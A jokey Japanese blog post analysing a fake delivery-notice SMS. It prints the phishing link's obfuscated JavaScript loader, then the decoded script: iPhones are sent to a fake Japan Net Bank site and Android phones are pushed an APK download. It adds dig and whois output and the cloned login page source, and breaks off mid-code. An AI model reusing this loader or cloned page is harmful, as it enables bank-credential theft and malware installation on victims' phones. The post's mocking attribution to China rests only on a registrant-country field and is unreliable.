宅配の不在通知SMSにはっつけられたリンクを辿ったら、ジャパンネットバンクのフィッシングサイトにたどり着いた。
■ 宅配の不在通知SMSが届いた
自宅警備員になってからというもの、拙者、自宅のワークスペースを快適にすることに余念がなくなりまして。オシャンティな芳香剤をアマゾネスで買いましたの。今日が配達日ってことで、チャイムもなってねーのに宅配ボックス確認しに2往復してみたり、トイレに籠るときは家族に「まじチャイム鳴ったらなにがなんでも出てください!」などとお願いしたりしておりまして。そんなとき、拙者のあいぽんさんに1通のSMSが。
なんですと!
チャイムもならしてねーのに、勝手に持ち帰るとはこれいかに!? (_□_;)!!
家族のものに「え、なんで出てくれなかったのさー、ぷんすこぷんすこ」などと悪態をつきながら、リンクをポチッたら。
■ SMSに書かれたリンク先をポチったらジャパンネットバンクの不正アクセスメッセージが出た
Safariが起動して、
【JNB】お客様がご利用のジャパンネット銀行に対し、第三者からの不正なアクセスを検知しました。ご確認ください。
っていうアラートメッセージが[OK]ボタンつきで出た。
ガーン。
これあかんやつや。拙者、何かふんだくさい。
とりあえず、何も押さずにそっ閉じ。Safariちゃんの履歴も全削。
まぁあれだよね、リンクが"https://"で始まってないことを最初から怪しむべきだったよね。
しょんぼり。
■ SMSに書かれたリンク先はiPhoneユーザーにとっては危険な存在だった
拙者のこの今までのウッキウキだった気持ちを叩き潰したSMS、許すまじ。
というわけで、このリンクが拙者のSafariちゃんの中で一体なにをしでかしたのか、調査開始。
まずは、このSMSに書かれたリンクのHTMLソースコードをゲット。
<!DOCTYPE html>
<html lang="\x6a\x61">
<head><meta http-equiv="\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65" content="\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x3b \x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38">
<script language =javascript>var F1=function(F1){return window["\x53\x74\x72\x69\x6e\x67"]["\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65"](F1^68)};window["\x65\x76\x61\x6c"](F1(77)+""+F1(77)+""+F1(50)+""+F1(37)+""+F1(54)+""+F1(100)+""+F1(38)+""+F1(54)+""+F1(43)+""+F1(51)+""+F1(55)+""+F1(33)+""+F1(54)+""+F1(100)+""+F1(121)+""+F1(100)+""+F1(63)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(50)+""+F1(33)+""+F1(54)+""+F1(55)+""+F1(45)+""+F1(43)+""+F1(42)+""+F1(55)+""+F1(126)+""+F1(100)+""+F1(34)+""+F1(49)+""+F1(42)+""+F1(39)+""+F1(48)+""+F1(45)+""+F1(43)+""+F1(42)+""+F1(100)+""+F1(108)+""+F1(109)+""+F1(100)+""+F1(63)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(50)+""+F1(37)+""+F1(54)+""+F1(100)+""+F1(49)+""+F1(100)+""+F1(121)+""+F1(100)+""+F1(42)+""+F1(37)+""+F1(50)+""+F1(45)+""+F1(35)+""+F1(37)+""+F1(48)+""+F1(43)+""+F1(54)+""+F1(106)+""+F1(49)+""+F1(55)+""+F1(33)+""+F1(54)+""+F1(5)+""+F1(35)+""+F1(33)+""+F1(42)+""+F1(48)+""+F1(104)+""+F1(100)+""+F1(37)+""+F1(52)+""+F1(52)+""+F1(100)+""+F1(121)+""+F1(100)+""+F1(42)+""+F1(37)+""+F1(50)+""+F1(45)+""+F1(35)+""+F1(37)+""+F1(48)+""+F1(43)+""+F1(54)+""+F1(106)+""+F1(37)+""+F1(52)+""+F1(52)+""+F1(18)+""+F1(33)+""+F1(54)+""+F1(55)+""+F1(45)+""+F1(43)+""+F1(42)+""+F1(127)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(54)+""+F1(33)+""+F1(48)+""+F1(49)+""+F1(54)+""+F1(42)+""+F1(100)+""+F1(63)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(48)+""+F1(54)+""+F1(45)+""+F1(32)+""+F1(33)+""+F1(42)+""+F1(48)+""+F1(126)+""+F1(100)+""+F1(49)+""+F1(106)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(33)+""+F1(60)+""+F1(11)+""+F1(34)+""+F1(108)+""+F1(99)+""+F1(16)+""+F1(54)+""+F1(45)+""+F1(32)+""+F1(33)+""+F1(42)+""+F1(48)+""+F1(99)+""+F1(109)+""+F1(100)+""+F1(122)+""+F1(100)+""+F1(105)+""+F1(117)+""+F1(104)+""+F1(100)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(52)+""+F1(54)+""+F1(33)+""+F1(55)+""+F1(48)+""+F1(43)+""+F1(126)+""+F1(100)+""+F1(49)+""+F1(106)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(33)+""+F1(60)+""+F1(11)+""+F1(34)+""+F1(108)+""+F1(99)+""+F1(20)+""+F1(54)+""+F1(33)+""+F1(55)+""+F1(48)+""+F1(43)+""+F1(99)+""+F1(109)+""+F1(100)+""+F1(122)+""+F1(100)+""+F1(105)+""+F1(117)+""+F1(104)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(51)+""+F1(33)+""+F1(38)+""+F1(15)+""+F1(45)+""+F1(48)+""+F1(126)+""+F1(100)+""+F1(49)+""+F1(106)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(33)+""+F1(60)+""+F1(11)+""+F1(34)+""+F1(108)+""+F1(99)+""+F1(5)+""+F1(52)+""+F1(52)+""+F1(40)+""+F1(33)+""+F1(19)+""+F1(33)+""+F1(38)+""+F1(15)+""+F1(45)+""+F1(48)+""+F1(99)+""+F1(109)+""+F1(100)+""+F1(122)+""+F1(100)+""+F1(105)+""+F1(117)+""+F1(104)+""+F1(100)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(35)+""+F1(33)+""+F1(39)+""+F1(47)+""+F1(43)+""+F1(126)+""+F1(100)+""+F1(49)+""+F1(106)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(33)+""+F1(60)+""+F1(11)+""+F1(34)+""+F1(108)+""+F1(99)+""+F1(3)+""+F1(33)+""+F1(39)+""+F1(47)+""+F1(43)+""+F1(99)+""+F1(109)+""+F1(100)+""+F1(122)+""+F1(100)+""+F1(105)+""+F1(117)+""+F1(100)+""+F1(98)+""+F1(98)+""+F1(100)+""+F1(49)+""+F1(106)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(33)+""+F1(60)+""+F1(11)+""+F1(34)+""+F1(108)+""+F1(99)+""+F1(15)+""+F1(12)+""+F1(16)+""+F1(9)+""+F1(8)+""+F1(99)+""+F1(109)+""+F1(100)+""+F1(121)+""+F1(121)+""+F1(100)+""+F1(105)+""+F1(117)+""+F1(104)+""+F1(100)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(41)+""+F1(43)+""+F1(38)+""+F1(45)+""+F1(40)+""+F1(33)+""+F1(126)+""+F1(100)+""+F1(101)+""+F1(101)+""+F1(49)+""+F1(106)+""+F1(41)+""+F1(37)+""+F1(48)+""+F1(39)+""+F1(44)+""+F1(108)+""+F1(107)+""+F1(5)+""+F1(52)+""+F1(52)+""+F1(40)+""+F1(33)+""+F1(19)+""+F1(33)+""+F1(38)+""+F1(15)+""+F1(45)+""+F1(48)+""+F1(106)+""+F1(110)+""+F1(9)+""+F1(43)+""+F1(38)+""+F1(45)+""+F1(40)+""+F1(33)+""+F1(106)+""+F1(110)+""+F1(107)+""+F1(109)+""+F1(104)+""+F1(100)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(45)+""+F1(43)+""+F1(55)+""+F1(126)+""+F1(100)+""+F1(101)+""+F1(101)+""+F1(49)+""+F1(106)+""+F1(41)+""+F1(37)+""+F1(48)+""+F1(39)+""+F1(44)+""+F1(108)+""+F1(107)+""+F1(24)+""+F1(108)+""+F1(45)+""+F1(31)+""+F1(26)+""+F1(127)+""+F1(25)+""+F1(111)+""+F1(127)+""+F1(108)+""+F1(100)+""+F1(17)+""+F1(127)+""+F1(109)+""+F1(123)+""+F1(100)+""+F1(7)+""+F1(20)+""+F1(17)+""+F1(106)+""+F1(111)+""+F1(9)+""+F1(37)+""+F1(39)+""+F1(100)+""+F1(11)+""+F1(23)+""+F1(100)+""+F1(28)+""+F1(107)+""+F1(109)+""+F1(104)+""+F1(100)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(37)+""+F1(42)+""+F1(32)+""+F1(54)+""+F1(43)+""+F1(45)+""+F1(32)+""+F1(126)+""+F1(100)+""+F1(49)+""+F1(106)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(33)+""+F1(60)+""+F1(11)+""+F1(34)+""+F1(108)+""+F1(99)+""+F1(5)+""+F1(42)+""+F1(32)+""+F1(54)+""+F1(43)+""+F1(45)+""+F1(32)+""+F1(99)+""+F1(109)+""+F1(100)+""+F1(122)+""+F1(100)+""+F1(105)+""+F1(117)+""+F1(100)+""+F1(56)+""+F1(56)+""+F1(100)+""+F1(49)+""+F1(106)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(33)+""+F1(60)+""+F1(11)+""+F1(34)+""+F1(108)+""+F1(99)+""+F1(8)+""+F1(45)+""+F1(42)+""+F1(49)+""+F1(60)+""+F1(99)+""+F1(109)+""+F1(100)+""+F1(122)+""+F1(100)+""+F1(105)+""+F1(117)+""+F1(104)+""+F1(100)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(45)+""+F1(20)+""+F1(44)+""+F1(43)+""+F1(42)+""+F1(33)+""+F1(126)+""+F1(100)+""+F1(49)+""+F1(106)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(33)+""+F1(60)+""+F1(11)+""+F1(34)+""+F1(108)+""+F1(99)+""+F1(45)+""+F1(20)+""+F1(44)+""+F1(43)+""+F1(42)+""+F1(33)+""+F1(99)+""+F1(109)+""+F1(100)+""+F1(122)+""+F1(100)+""+F1(105)+""+F1(117)+""+F1(104)+""+F1(100)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(45)+""+F1(20)+""+F1(37)+""+F1(32)+""+F1(126)+""+F1(100)+""+F1(49)+""+F1(106)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(33)+""+F1(60)+""+F1(11)+""+F1(34)+""+F1(108)+""+F1(99)+""+F1(45)+""+F1(20)+""+F1(37)+""+F1(32)+""+F1(99)+""+F1(109)+""+F1(100)+""+F1(122)+""+F1(100)+""+F1(105)+""+F1(117)+""+F1(104)+""+F1(100)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(57)+""+F1(127)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(57)+""+F1(108)+""+F1(109)+""+F1(104)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(40)+""+F1(37)+""+F1(42)+""+F1(35)+""+F1(49)+""+F1(37)+""+F1(35)+""+F1(33)+""+F1(126)+""+F1(100)+""+F1(108)+""+F1(42)+""+F1(37)+""+F1(50)+""+F1(45)+""+F1(35)+""+F1(37)+""+F1(48)+""+F1(43)+""+F1(54)+""+F1(106)+""+F1(38)+""+F1(54)+""+F1(43)+""+F1(51)+""+F1(55)+""+F1(33)+""+F1(54)+""+F1(8)+""+F1(37)+""+F1(42)+""+F1(35)+""+F1(49)+""+F1(37)+""+F1(35)+""+F1(33)+""+F1(100)+""+F1(56)+""+F1(56)+""+F1(100)+""+F1(42)+""+F1(37)+""+F1(50)+""+F1(45)+""+F1(35)+""+F1(37)+""+F1(48)+""+F1(43)+""+F1(54)+""+F1(106)+""+F1(40)+""+F1(37)+""+F1(42)+""+F1(35)+""+F1(49)+""+F1(37)+""+F1(35)+""+F1(33)+""+F1(109)+""+F1(106)+""+F1(48)+""+F1(43)+""+F1(8)+""+F1(43)+""+F1(51)+""+F1(33)+""+F1(54)+""+F1(7)+""+F1(37)+""+F1(55)+""+F1(33)+""+F1(108)+""+F1(109)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(57)+""+F1(127)+""+F1(73)+""+F1(78)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(45)+""+F1(34)+""+F1(100)+""+F1(108)+""+F1(38)+""+F1(54)+""+F1(43)+""+F1(51)+""+F1(55)+""+F1(33)+""+F1(54)+""+F1(106)+""+F1(50)+""+F1(33)+""+F1(54)+""+F1(55)+""+F1(45)+""+F1(43)+""+F1(42)+""+F1(55)+""+F1(106)+""+F1(45)+""+F1(43)+""+F1(55)+""+F1(100)+""+F1(56)+""+F1(56)+""+F1(100)+""+F1(38)+""+F1(54)+""+F1(43)+""+F1(51)+""+F1(55)+""+F1(33)+""+F1(54)+""+F1(106)+""+F1(50)+""+F1(33)+""+F1(54)+""+F1(55)+""+F1(45)+""+F1(43)+""+F1(42)+""+F1(55)+""+F1(106)+""+F1(45)+""+F1(20)+""+F1(44)+""+F1(43)+""+F1(42)+""+F1(33)+""+F1(100)+""+F1(56)+""+F1(56)+""+F1(100)+""+F1(38)+""+F1(54)+""+F1(43)+""+F1(51)+""+F1(55)+""+F1(33)+""+F1(54)+""+F1(106)+""+F1(50)+""+F1(33)+""+F1(54)+""+F1(55)+""+F1(45)+""+F1(43)+""+F1(42)+""+F1(55)+""+F1(106)+""+F1(45)+""+F1(20)+""+F1(37)+""+F1(32)+""+F1(109)+""+F1(100)+""+F1(63)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(51)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(43)+""+F1(51)+""+F1(106)+""+F1(37)+""+F1(40)+""+F1(33)+""+F1(54)+""+F1(48)+""+F1(108)+""+F1(102)+""+F1(12372)+""+F1(14)+""+F1(10)+""+F1(6)+""+F1(12373)+""+F1(12302)+""+F1(23526)+""+F1(27036)+""+F1(12296)+""+F1(12304)+""+F1(21101)+""+F1(30060)+""+F1(12330)+""+F1(12540)+""+F1(12455)+""+F1(12437)+""+F1(12471)+""+F1(12425)+""+F1(12423)+""+F1(12428)+""+F1(37572)+""+F1(34824)+""+F1(12335)+""+F1(23482)+""+F1(12307)+""+F1(12357)+""+F1(31592)+""+F1(20045)+""+F1(32833)+""+F1(12303)+""+F1(12493)+""+F1(12330)+""+F1(20041)+""+F1(27431)+""+F1(12334)+""+F1(12518)+""+F1(12523)+""+F1(12543)+""+F1(12541)+""+F1(12502)+""+F1(26968)+""+F1(30625)+""+F1(12307)+""+F1(12346)+""+F1(12307)+""+F1(12315)+""+F1(12358)+""+F1(12304)+""+F1(30974)+""+F1(35529)+""+F1(12299)+""+F1(12324)+""+F1(12305)+""+F1(12288)+""+F1(12358)+""+F1(102)+""+F1(109)+""+F1(127)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(51)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(43)+""+F1(51)+""+F1(106)+""+F1(40)+""+F1(43)+""+F1(39)+""+F1(37)+""+F1(48)+""+F1(45)+""+F1(43)+""+F1(42)+""+F1(106)+""+F1(44)+""+F1(54)+""+F1(33)+""+F1(34)+""+F1(121)+""+F1(99)+""+F1(44)+""+F1(48)+""+F1(48)+""+F1(52)+""+F1(126)+""+F1(107)+""+F1(107)+""+F1(46)+""+F1(42)+""+F1(38)+""+F1(105)+""+F1(41)+""+F1(38)+""+F1(106)+""+F1(39)+""+F1(43)+""+F1(41)+""+F1(99)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(57)+""+F1(100)+""+F1(33)+""+F1(40)+""+F1(55)+""+F1(33)+""+F1(100)+""+F1(45)+""+F1(34)+""+F1(100)+""+F1(108)+""+F1(38)+""+F1(54)+""+F1(43)+""+F1(51)+""+F1(55)+""+F1(33)+""+F1(54)+""+F1(106)+""+F1(50)+""+F1(33)+""+F1(54)+""+F1(55)+""+F1(45)+""+F1(43)+""+F1(42)+""+F1(55)+""+F1(106)+""+F1(37)+""+F1(42)+""+F1(32)+""+F1(54)+""+F1(43)+""+F1(45)+""+F1(32)+""+F1(109)+""+F1(100)+""+F1(63)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(51)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(43)+""+F1(51)+""+F1(106)+""+F1(37)+""+F1(40)+""+F1(33)+""+F1(54)+""+F1(48)+""+F1(108)+""+F1(102)+""+F1(12543)+""+F1(12521)+""+F1(12449)+""+F1(12462)+""+F1(12418)+""+F1(12519)+""+F1(21589)+""+F1(20046)+""+F1(12330)+""+F1(12315)+""+F1(12485)+""+F1(104)+""+F1(26436)+""+F1(26100)+""+F1(12436)+""+F1(12472)+""+F1(12540)+""+F1(12451)+""+F1(12471)+""+F1(12330)+""+F1(7)+""+F1(44)+""+F1(54)+""+F1(43)+""+F1(41)+""+F1(33)+""+F1(12335)+""+F1(12518)+""+F1(12423)+""+F1(12435)+""+F1(12419)+""+F1(12472)+""+F1(12428)+""+F1(12307)+""+F1(12322)+""+F1(12299)+""+F1(12324)+""+F1(12305)+""+F1(12288)+""+F1(106)+""+F1(102)+""+F1(109)+""+F1(127)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(77)+""+F1(51)+""+F1(45)+""+F1(42)+""+F1(32)+""+F1(43)+""+F1(51)+""+F1(106)+""+F1(40)+""+F1(43)+""+F1(39)+""+F1(37)+""+F1(48)+""+F1(45)+""+F1(43)+""+F1(42)+""+F1(106)+""+F1(44)+""+F1(54)+""+F1(33)+""+F1(34)+""+F1(100)+""+F1(121)+""+F1(100)+""+F1(102)+""+F1(47)+""+F1(38)+""+F1(41)+""+F1(53)+""+F1(50)+""+F1(32)+""+F1(51)+""+F1(34)+""+F1(40)+""+F1(34)+""+F1(106)+""+F1(37)+""+F1(52)+""+F1(47)+""+F1(102)+""+F1(127)+""+F1(73)+""+F1(78)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(57)+""+F1(100)+""+F1(33)+""+F1(40)+""+F1(55)+""+F1(33)+""+F1(100)+""+F1(63)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(73)+""+F1(78)+""+F1(73)+""+F1(78)+""+F1(73)+""+F1(78)+""+F1(77)+""+F1(77)+""+F1(57)+""+'');</script>
ふむ。なるほど。JSが実行されちゃう系ですね、はい。
JSの中身は、最初「なんじゃこれ、F1ばっかりで意味不。」って思いましたけども、ただ単にソースコードを簡単に読まれないようにがんばった系なだけ。無事、いつものJSに変換完了。
実際に実行されているJSはこれ。
window["eval"](
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion;
return {
trident: u.indexOf('Trident') > -1,
presto: u.indexOf('Presto') > -1,
webKit: u.indexOf('AppleWebKit') > -1,
gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1,
mobile: !!u.match(/AppleWebKit.*Mobile.*/),
ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1,
iPhone: u.indexOf('iPhone') > -1,
iPad: u.indexOf('iPad') > -1,
};
}(),
language: (navigator.browserLanguage || navigator.language).toLowerCase()
};
if (browser.versions.ios || browser.versions.iPhone || browser.versions.iPad) {
window.alert("【JNB】お客様がご利用のジャパンネット銀行に対し、第三者からの不正なアクセスを検知しました。ご確認ください。");
window.location.href='http://jnb-mb.com'
} else if (browser.versions.android) {
window.alert("セキュリティ向上のため,最新バージョンのChromeにアップデートしてください.");
window.location.href = "kbmqvdwflf.apk";
} else {
}
);
つまり、このリンクにアクセスした端末がiPhoneかiPadだったら、
”【JNB】お客様がご利用のジャパンネット銀行に対し、第三者からの不正なアクセスを検知しました。ご確認ください。” のメッセージが出る
そんで、そのメッセージのOKボタンを押してしまうと、ジャパンネットバンクのフィッシングサイトに飛ぶ!
という動き。何もリンクを押さずにそっ閉じした拙者、セーフ!
■ 誘導先のジャパンネットバンクのフィッシングサイトのサーバーは、セーシェルにあった
さて、このフィッシングサイトはどこにおられるのかな、っていうことで、まずはIPアドレスを確認。
$ dig jnb-mb.com
; <<>> DiG 9.10.6 <<>> jnb-mb.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12110
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;jnb-mb.com. IN A
;; ANSWER SECTION:
jnb-mb.com. 1581 IN A 154.202.29.246
;; Query time: 18 msec
;; SERVER: 2400:4050:2920:4800:225:36ff:fecf:a621#53(2400:4050:2920:4800:225:36ff:fecf:a621)
;; WHEN: Sat Jun 06 16:50:10 JST 2020
;; MSG SIZE rcvd: 55
このIPアドレスを保有している国は・・・
154.202.29.246
国名: セーシェル
国名コード: SC
管轄: AFRINIC
どこそれ。セーシェルって、どこよ。
"セーシェル共和国(セーシェルきょうわこく)、通称セーシェルは、アフリカ大陸から1300 kmほど離れたインド洋に浮かぶ115の島々からなる島国で、イギリス連邦加盟国である。首都はヴィクトリアと定められている。"
ほほーう。
なんだこれ系のフィッシングは、てっきりまたちうごくの鯖なのかなーなんて思ってたけど、違うのかー。
■ やっぱりちうごくの仕業か!
まぁ鯖は今時どこでもつくれるもんね、っていうことでこのフィッシングサイトのドメインを誰が持ってるのか調べてみた。
$ whois jnb-mb.com
:
# whois.godaddy.com
Domain Name: jnb-mb.com
Registry Domain ID: 2534501799_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2020-06-06T04:55:24Z
Creation Date: 2020-06-06T04:55:23Z
Registrar Registration Expiration Date: 2021-06-06T04:55:23Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registrant Organization:
Registrant State/Province: Henan
Registrant Country: CN
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=jnb-mb.com
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=jnb-mb.com
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=jnb-mb.com
Name Server: NS53.DOMAINCONTROL.COM
Name Server: NS54.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2020-06-06T10:00:00Z <<<
まぁ、レジストラがGoDaddyなのはいいとして。ぬ!!
Registrant Country: CN
ちうごくか!ちうごくで取得されたドメインなのだな!
やはりフィッシングサイトは案の定ちうごくが関わっているのだな!
■ ジャパンネットバンクのフィッシングサイトはジャパンネットバンクへのログイン画面とソックリ
お次は、ジャパンネットバンクのフィッシングサイトがどんな感じで動いておるのか、確認するためにソースコードをゲッツ。
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="ja">
<head>
<link rel="canonical" href="https://login.japannetbank.co.jp/wctx/LoginAction.do">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta name="format-detection" content="telephone=no">
<meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=yes">
<title>ログイン - ジャパンネット銀行</title>
<meta name="description" content="ジャパンネット銀行取引画面へのログイン画面です。">
<link rel="stylesheet" type="text/css" href="static/css/reset.css" media="screen, print">
<link rel="stylesheet" type="text/css" href="static/css/common_smt.css?v=170921" media="screen, print">
<link rel="stylesheet" type="text/css" href="static/css/login_smt.css?v=190822" media="screen, print">
<script type="text/javascript">
<!--
(function() {
document.cookie = "___tk336450=" + encodeURIComponent(Math.random()) + ";path=/;domain=japannetbank.co.jp";
})();
//-->
</script>
<script type="text/javascript" src="static/js/jquery-1.7.1.min.js"></script>
<script type="text/javascript" src="static/js/javalib.js"></script>
<script type="text/javascript" src="static/js/jstz.min.js"></script>
<script type="text/javascript" src="static/js/check.js"></script>
<script type="text/javascript" src="static/js/nb_error.js"></script>
<script type="text/javascript" src="static/js/cookie.js"></script>
<script type="text/javascript" src="static/js/main.js"></script>
<script type="text/javascript">
<!--
function k276eb0204d2d4202(checkFORM) {
var flg;
var errFlg = 0;
var errObj = "";
var i;
for(i=0;;i++){
switch( i ){
case 0:
flg = isNumStr(checkFORM.TenNo,3,1);
if(flg == true){
errFlg = 88;
break;
}
flg = isEmpty(checkFORM.TenNo.value);
if(flg == true){
errFlg = 9;
errObj = checkFORM.TenNo;
}
break;
case 1:
flg = isNumStr(checkFORM.KozaNo,7,1);
if(flg == true){
errFlg = 88;
break;
}
flg = isEmpty(checkFORM.KozaNo.value);
if(flg == true){
errFlg = 9;
errObj = checkFORM.KozaNo;
}
break;
case 2:
flg = isEmpty(checkFORM.Pw.value);
if(flg == true){
errFlg = 9;
errObj = checkFORM.Pw;
}
break;
default:
errFlg = 99;
}
if( errFlg == 99 ){
errFlg = 0;
break;
}else if( errFlg == 88 ){
break;
}else if( errFlg != 0 ){
nbError( errFlg, errObj );
break;
}
}
if (errFlg != 0){
return(false);
}
if( errFlg == 0 ){
checkFORM.target='_self';
checkFORM.__type.value = "0001";
checkFORM.__uid.value = checkFORM.TenNo.value + checkFORM.KozaNo.value;
checkFORM.__gid.value = checkFORM.__gid.value;
checkFORM.__fid.value = "NBG12340";
checkFORM.__bid.value = "20";
checkFORM.B_ID.value = "";
checkFORM.__sid.value = "";
checkFORM.ShikiCode.value = "";
checkFORM.LoginIdFlg.value = "0";
checkFORM.rw_screenparam_button.value = "login";
checkFORM.TimeZone.value = new Date().toString();
checkFORM.TimeZoneDetect.value = jstz.determine().name();
checkFORM.ScreenWidth.value = screen.width;
checkFORM.ScreenHeight.value = screen.height;
checkFORM.ScreenColorDepth.value = screen.colorDepth;
checkFORM.NavigatorPlatform.value = navigator.platform;
}
return(true);
}
function toLoginId(){
var subwin = window.open('','subwin','scrollbars=yes,resizable=yes,status=yes,location=yes');
subwin.focus();
document.HOST.target = 'subwin';
document.HOST.__gid.value = "NBG12340G11";
document.HOST.__type.value = "0003";
document.HOST.__sid.value = "00000";
document.HOST.__uid.value = "00000";
document.HOST.__fid.value = "NBG12740";
document.HOST.B_ID.value = "1";
document.HOST.ShikiCode.value = "";
document.HOST.rw_screenparam_button.value = "";
document.HOST.TimeZone.value = "";
document.HOST.TimeZoneDetect.value = "";
document.HOST.ScreenWidth.value = "";
document.HOST.ScreenHeight.value = "";
document.HOST.ScreenColorDepth.value = "";
document.HOST.NavigatorPlatform.value = "";
document.HOST.submit();
}
function toLoginPw(){
document.HOST.target = '_self';
document.HOST.__gid.value = "NBG12340G11";
document.HOST.__type.value = "0003";
document.HOST.__uid.value = "00000";
document.HOST.__sid.value = "00000";
document.HOST.__fid.value = "NBG12511";
document.HOST.B_ID.value = "1";
document.HOST.ShikiCode.value = "8000";
document.HOST.rw_screenparam_button.value = "";
document.HOST.TimeZone.value = "";
document.HOST.TimeZoneDetect.value = "";
document.HOST.ScreenWidth.value = "";
document.HOST.ScreenHeight.value = "";
document.HOST.ScreenColorDepth.value = "";
document.HOST.NavigatorPlatform.value = "";
document.HOST.submit();
}
function getSefasdIkk(){
return "0B0021D0770A0F43AEF63713CC7031CF594C74C5B565AA1A16657C0CAEDC752C";
}
function showUnsupportedInfo(ua){
var targetUA = new Array(/Windows 95/, /Windows 98/, /Windows 3\.1/, /Windows NT 4\./, /Windows NT 5\./, /WindowsNT 5\.1;/, /Android 1\./, /Android 2\.0/, /Android 2\.1/, /Android 2\.2/, /Mac OS X 10\.4/, /Mac OS X 10_4/);
if(ua){
for(var i=0; i<targetUA.length; i++){
if(ua.search(targetUA[i])>-1){
return true;
}
}
}
return false;
}
$(function(){
var ua = window.navigator.userAgent;
document.HOST.userAgent.value = ua ? ua : '';
$("#chkListToggle").bind("click", function(){
$("#chkList").toggleClass("on");
});
if(showUnsupportedInfo(ua)){
$("#limitedNews").addClass("on");
}
$("#idPw").after("<p id='pwCount' style='display:none;'><span class='count'>0</span>文字</p>");
$("#idPw").bind("keyup keydown change focus blur",function(){
var pwCount = $(this).val().length;
$(".count").html(pwCount);
if(pwCount == 0){
$("#pwCount").hide();
}else{
$("#pwCount").show();
}
});
$(function(){
var params = {
"ptak": "0B0021D0770A0F43AEF63713CC7031CF594C74C5B565AA1A16657C0CAEDC752C"
};
$.ajax({
type : "GET",
url : "https://login.japannetbank.co.jp" + "/wctx/ifwmjwtra.js",
dataType : "jsonp",
